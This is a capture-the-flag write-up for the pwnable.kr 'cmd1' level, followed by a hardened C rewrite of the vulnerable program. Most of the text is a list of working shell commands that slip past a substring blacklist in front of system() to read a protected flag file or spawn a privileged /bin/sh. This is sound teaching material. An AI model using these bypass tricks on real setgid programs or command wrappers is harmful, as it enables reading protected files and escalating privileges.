cmd1 - 1 pt
Mommy! what is PATH environment in Linux?
ssh [email protected] -p2222 (pw:guest)
After logging in to the server, cmd1 runs with the cmd1_pwn group privilege (setgid), so it can read flag.
[email protected]:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14 2015 cmd1
-rw-r--r-- 1 root root 320 Mar 23 2018 cmd1.c
-r--r----- 1 root cmd1_pwn 48 Jul 14 2015 flag
This level does not have much code, so let's look straight at the source.
#include <stdio.h>
#include <stdlib.h>   // putenv, system (not included in the original listing; no change in behaviour)
#include <string.h>

// Returns the number of blacklisted substrings found in cmd (0 means the command passes).
int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "flag")!=0;
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;
    return r;
}
int main(int argc, char* argv[], char** envp){
    putenv("PATH=/thankyouverymuch");   // PATH lookups no longer find any binary
    if(filter(argv[1])) return 0;       // substring blacklist applied to the raw argument
    system( argv[1] );                  // the surviving string is handed to /bin/sh -c
    return 0;
}
The disassembly of the assignment to r is as follows:
call    _strstr
test    rax, rax            ; is the return value 0? sets ZF accordingly
setnz   al                  ; set if not zero: ZF=1 gives al=0, ZF=0 gives al=1
movzx   eax, al             ; zero-extend the 8-bit al to 32 bits (movzx is unsigned, movsx is signed)
add     [rbp+var_4], eax    ; update r
strstr is a Standard C Library function; let's take a look at how it behaves.
SYNOPSIS
#include <string.h>
char * strstr(const char *haystack, const char *needle);
DESCRIPTION
The strstr() function locates the first occurrence of the null-terminated string needle in the null-terminated string haystack.
RETURN VALUES
If needle is an empty string, haystack is returned; if needle occurs nowhere in haystack, NULL is returned; otherwise a pointer to the first character of the first occurrence of needle is returned.
That is: if needle is the empty string, strstr returns haystack; if needle does not occur, it returns NULL; otherwise it returns a pointer to the first match.
This level calls putenv to overwrite the PATH environment variable, so the usual commands have to be run by absolute path (or PATH restored with export first). In addition, argv[1] goes through filter, so the substrings flag, sh and tmp may not appear in it. Finally system is called on the argument. Clearly this level wants us to find some ways to bypass the filter.
flag
Here is a summary of the ways to get the flag so far.
# wildcard: cat fla* can read the flag
[email protected]:~$ ./cmd1 /b"in/cat /home/cmd1/fla*"
mommy now I get what PATH environment is for :)
# string concatenation: 'f'la'g' is still flag in bash
[email protected]:~$ echo 'f'la'g'
flag
[email protected]:~$ ./cmd1 "/bin/cat /home/cmd1/'f'lag"
mommy now I get what PATH environment is for :)
[email protected]:~$ echo 'f'lag
flag
[email protected]:~$ echo "f"lag
flag
[email protected]:~$ ./cmd1 "/bin/cat /home/cmd1/\"f\"lag"
mommy now I get what PATH environment is for :)
# set an environment variable with env and use it to get the flag
[email protected]:~$ env x='/bin/cat /home/cmd1/flag' ./cmd1 "\$x"
mommy now I get what PATH environment is for :)
# open the file from within vim
./cmd1 /usr/bin/vim
:e flag
# escape a character that does not need escaping, such as \a
[email protected]:~$ ./cmd1 "/bin/cat fl\ag"
mommy now I get what PATH environment is for :)
# base64 decode
[email protected]:~$ ./cmd1 '/bin/cat $(echo "ZmxhZwo=" | /usr/bin/base64 -d)'
mommy now I get what PATH environment is for :)
# write a bash script directly, quick and dirty, by v4r4n
[email protected]:~$ echo /bin/cat /home/cmd1/flag > /var/lib/php/sessions/asd
[email protected]:~$ chmod +x /var/lib/php/sessions/asd
[email protected]:~$ ./cmd1 /var/lib/php/sessions/asd
mommy now I get what PATH environment is for :)
# use more to view every file in the current directory
./cmd1 "/bin/more *"
...
There is also one thing I don't quite understand: /bin/sh gets the cmd1_pwn privilege, but /bin/bash does not.
[email protected]:~$ ./cmd1 "/bin/bas''h"
bash-4.3$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) groups=1025(cmd1)
bash-4.3$ exit
exit
[email protected]:~$ ./cmd1 "/bin/s''h"
$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) egid=1026(cmd1_pwn) groups=1026(cmd1_pwn),1025(cmd1)
$ /bin/cat flag
mommy now I get what PATH environment is for :)
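As an added example that is not part of this writeup or the challenge, here is a hardened counterpart to cmd1.c: the argument never reaches a shell (so the quoting, globbing, $(...) and backslash tricks above become literal bytes), the program is chosen by exact allowlist match instead of a substring blacklist, and the inherited setgid group is dropped before exec, which is what bash does on its own when egid differs from gid and why the bash session above lacks cmd1_pwn while /bin/sh (usually dash) keeps it. The allowlist entries and the command strings are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define MAX_ARGS 8

/* Sample allowlist (constructed for this example): only these programs may run. */
static const char *const allowed[] = { "/bin/ls", "/usr/bin/id", NULL };

/* Split cmd on blanks into a NULL-terminated args vector; with no shell involved,
 * quotes, globs, $(...) and backslashes stay literal bytes. args[0] must match an
 * allowlisted program exactly (no substring blacklist). Returns argc or -1. */
int parse_command(const char *cmd, char *buf, size_t buflen, char *args[MAX_ARGS]) {
    if (strlen(cmd) >= buflen) return -1;
    strcpy(buf, cmd);
    int n = 0;
    for (char *tok = strtok(buf, " \t"); tok; tok = strtok(NULL, " \t")) {
        if (n >= MAX_ARGS - 1) return -1;             /* too many arguments */
        args[n++] = tok;
    }
    args[n] = NULL;
    for (const char *const *p = allowed; n > 0 && *p; p++)
        if (strcmp(args[0], *p) == 0) return n;
    return -1;                                        /* empty or not allowlisted */
}

/* Wrapper with its own buffers: argument count if cmd is acceptable, else -1. */
int check_command(const char *cmd) {
    char buf[256], *args[MAX_ARGS];
    return parse_command(cmd, buf, sizeof buf, args);
}

/* Drop the inherited setgid group (bash does this itself when egid != gid, dash
 * does not, matching the id output above), then execve with a fixed environment. */
int run_command(char *args[]) {
    char *envp[] = { "PATH=/usr/bin:/bin", NULL };
    if (setgid(getgid()) != 0) return -1;
    return execve(args[0], args, envp);               /* returns only on failure */
}

int main(int argc, char *argv[]) {
    char buf[256], *args[MAX_ARGS];
    if (argc != 2 || parse_command(argv[1], buf, sizeof buf, args) < 0) {
        fputs("rejected\n", stderr);
        return 1;
    }
    run_command(args);
    perror("exec failed");
    return 1;
}
```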